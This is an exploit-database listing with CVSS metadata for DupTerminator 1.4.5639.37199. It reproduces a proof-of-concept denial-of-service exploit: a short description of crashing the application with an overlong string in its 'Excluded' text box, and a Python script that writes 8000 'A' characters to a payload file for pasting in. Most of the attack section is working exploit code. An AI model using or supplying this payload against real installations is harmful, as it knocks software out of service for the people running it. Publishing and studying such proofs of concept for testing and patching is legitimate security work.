Advertisement






DupTerminator 1.4.5639.37199 Denial of Service (PoC)

CVE Category Price Severity
N/A CWE-20 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-06-02
CPE
cpe:cpe:/a:dupterminator:1:4:5639:37199:denial_of_service_poc
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.25 0.631678

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060012

Below is a copy:

DupTerminator 1.4.5639.37199 Denial of Service (PoC)
# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
# Date: 2021-05-28
# Author: Brian Rodrguez
# Software Site: https://sourceforge.net/projects/dupterminator/
# Version: 1.4.5639.37199
# Category: DoS (Windows)

##### Vulnerability #####

DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.

Successful exploitation will causes application stop working.

I have been able to test this exploit against Windows 10.

##### PoC #####

#!/usr/bin/env python
buffer = "\x41" * 8000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum